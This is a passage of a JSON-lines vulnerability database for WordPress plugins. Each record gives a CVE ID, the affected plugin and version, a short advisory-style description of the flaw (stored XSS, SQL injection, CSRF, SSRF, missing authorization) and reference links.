\\/3296099\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slim-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slim-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6318a1cf-716f-450c-a1c2-497de8095daa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6318a1cf-716f-450c-a1c2-497de8095daa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5338","slug":"royal-elementor-addons","versionImpact":"1.7.1024","description":"The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.7.1024 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1022\\\/assets\\\/js\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1022\\\/assets\\\/js\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309082\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309082\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/201ff7b6-d72a-43c3-a7b1-c4f917c9d27f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/201ff7b6-d72a-43c3-a7b1-c4f917c9d27f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6380","slug":"onlyoffice","description":"The ONLYOFFICE Docs plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its oo.callback REST endpoint in versions 1.1.0 to 2.2.0. The plugin\u2019s permission callback only verifies that the supplied, encrypted attachment ID maps to an existing attachment post, but does not verify the requester\u2019s identity or capabilities. This makes it possible for unauthenticated attackers to log in as an arbitrary user.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/class-onlyoffice-plugin-public.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/class-onlyoffice-plugin-public.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/views\\\/class-onlyoffice-plugin-callback.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onlyoffice\\\/tags\\\/2.2.0\\\/public\\\/views\\\/class-onlyoffice-plugin-callback.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/onlyoffice\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/onlyoffice\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/608b0506-074b-4df3-8c30-57cfb090f553?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/608b0506-074b-4df3-8c30-57cfb090f553?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28662","slug":"gift-voucher","versionImpact":"4.3.1","description":"The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2715","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_ticket' function in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers to create a support ticket that sends the website's data to the plugin developer, and it is also possible to create an admin access with an auto login link that is also sent to the plugin developer with the ticket. It only works if the plugin is activated with a valid license.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24747507-8f24-499e-a257-d379dc171e18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24747507-8f24-499e-a257-d379dc171e18?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L220\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1404","slug":"show-posts","versionImpact":"1.6","description":"The Weaver Show Posts Plugin for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 1.6. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/show-posts\\\/tags\\\/1.6\\\/includes\\\/atw-showposts-sc.php#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/show-posts\\\/tags\\\/1.6\\\/includes\\\/atw-showposts-sc.php#L368\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8647c44-4879-4895-bd07-19f7d62a7326?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8647c44-4879-4895-bd07-19f7d62a7326?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1568","slug":"seraphinite-accelerator","versionImpact":"2.20.52","description":"The Seraphinite Accelerator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.20.52 via the OnAdminApi_HtmlCheck function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07287a85-df00-408a-8b02-978fd3116155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07287a85-df00-408a-8b02-978fd3116155?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040707\\\/seraphinite-accelerator\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3040707\\\/seraphinite-accelerator\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1080","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.4","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the heading tag in all versions up to, and including, 2.7.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/heading\\\/includes\\\/frontend.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/heading\\\/includes\\\/frontend.php#L1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0910","slug":"restrict-for-elementor","versionImpact":"1.0.6","description":"The Restrict for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.6 due to improper restrictions on hidden data that make it accessible through the REST API. This makes it possible for unauthenticated attackers to extract potentially sensitive data from post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/restrict-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/restrict-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7150","slug":"slider-wd","versionImpact":"1.2.57","description":"The Slider by 10Web \u2013 Responsive Image Slider plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.2.57 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74d635b6-2b4a-49af-af5c-6bfa1b5d220e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74d635b6-2b4a-49af-af5c-6bfa1b5d220e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-wd\\\/tags\\\/1.2.57\\\/frontend\\\/models\\\/WDSModelSlider.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-wd\\\/tags\\\/1.2.57\\\/frontend\\\/models\\\/WDSModelSlider.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slider-wd\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slider-wd\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131688\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6853","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking WordPress plugin through 0.1.12 does not have a CSRF check when updating welcome popups, which could allow attackers to make logged-in admins perform such an action via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1ce78c3-5d6c-465e-9ce8-6d92f7480333\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1ce78c3-5d6c-465e-9ce8-6d92f7480333\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9364","slug":"wp-sendgrid-mailer","versionImpact":"1.4","description":"The SendGrid for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_mailplus_clear_logs' function in all versions up to, and including, 1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's log files.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-sendgrid-mailer\\\/tags\\\/1.4\\\/wp-sendgrid-mailer.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-sendgrid-mailer\\\/tags\\\/1.4\\\/wp-sendgrid-mailer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sendgrid-mailer\\\/trunk\\\/wp-sendgrid-mailer.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sendgrid-mailer\\\/trunk\\\/wp-sendgrid-mailer.php#L167\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11192","slug":"spotify-play-button-for-wordpress","versionImpact":"2.11","description":"The Spotify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spotifyplaybutton shortcode in all versions up to, and including, 2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spotify-play-button-for-wordpress\\\/tags\\\/2.11\\\/sptify-play-button-for-wordpress.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fspotify-play-button-for-wordpress&old=3189556&new_path=%2Fspotify-play-button-for-wordpress&new=3191339&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fspotify-play-button-for-wordpress&old=3189556&new_path=%2Fspotify-play-button-for-wordpress&new=3191339&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotify-play-button-for-wordpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spotify-play-button-for-wordpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52e43dd-46b4-445b-b350-a2fd76315869?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52e43dd-46b4-445b-b350-a2fd76315869?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13876","slug":"meintopf","versionImpact":"0.2.1","description":"The mEintopf WordPress plugin through 0.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d80cd18a-065f-443b-b548-d780b785d68e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d80cd18a-065f-443b-b548-d780b785d68e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2128","slug":"cost-calculator-builder","versionImpact":"3.2.67","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order_ids\u2019 parameter in all versions up to, and including, 3.2.67 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/includes\\\/classes\\\/models\\\/Payments.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cost-calculator-builder\\\/trunk\\\/includes\\\/classes\\\/models\\\/Payments.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263770\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3263770\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cost-calculator-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cost-calculator-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a7157c0-8378-4aa0-bc47-635be4ba2f8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a7157c0-8378-4aa0-bc47-635be4ba2f8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2248","slug":"wp-programmmanager","versionImpact":"1.2","description":"The WP-PManager WordPress plugin through 1.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b470a277-f5ad-49ff-97dd-4d3ee0269e5a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b470a277-f5ad-49ff-97dd-4d3ee0269e5a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4221","slug":"animated-buttons","versionImpact":"1.0.0","description":"The Animated Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'auto-downloader' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-buttons\\\/trunk\\\/Animated_Buttons.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/animated-buttons\\\/trunk\\\/Animated_Buttons.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e778399f-f7fe-47c5-9722-b833d78f475c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e778399f-f7fe-47c5-9722-b833d78f475c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6262","slug":"muse-ai","versionImpact":"0.4","description":"The muse.ai video embedding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's muse-ai shortcode in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/muse-ai\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/muse-ai\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790d6336-0c16-4058-9ddb-d182ef56263c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790d6336-0c16-4058-9ddb-d182ef56263c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28661","slug":"wp-popup-banners","versionImpact":"1.2.5","description":"The WP Popup Banners WordPress Plugin, version <= 1.2.5, is affected by an authenticated SQL injection vulnerability in the 'value' parameter in the get_popup_data action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2714","slug":"groundhogg","versionImpact":"2.7.9.8","description":"The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'check_license' functions in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the license key and support license key, but it can only be changed to a valid license key.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/help\\\/help-page.php#L41\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29700844-b41d-4f10-90a7-06c8574d8d2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29700844-b41d-4f10-90a7-06c8574d8d2a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2914493\\\/groundhogg\\\/tags\\\/2.7.10\\\/admin\\\/help\\\/help-page.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/guided-setup\\\/guided-setup.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/2.7.9.8\\\/admin\\\/guided-setup\\\/guided-setup.php#L111\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2517","slug":"metform","versionImpact":"3.3.2","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.2. This is due to missing or incorrect nonce validation on the permalink_setup function. This makes it possible for unauthenticated attackers to change the permalink structure via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. While nonce verification is implemented, verification only takes place when a nonce is provided.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/plugin.php#L544\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2924362%40metform%2Ftrunk&old=2910040%40metform%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2924362%40metform%2Ftrunk&old=2910040%40metform%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/metform\\\/trunk?contextall=1&old=2896914&old_path=%2Fmetform%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/metform\\\/trunk?contextall=1&old=2896914&old_path=%2Fmetform%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca66afc3-a749-4ddc-8e2f-959f65cebd45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca66afc3-a749-4ddc-8e2f-959f65cebd45?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37992","slug":"smarty-for-wordpress","versionImpact":"3.1.35","description":"Cross-Site Request Forgery (CSRF) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <= 3.1.35 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1074","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the audio widget 'link_url' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/modules\\\/audio\\\/includes\\\/frontend.php?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/modules\\\/audio\\\/includes\\\/frontend.php?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/audio\\\/includes\\\/frontend.php\",\"refsource\":\"\",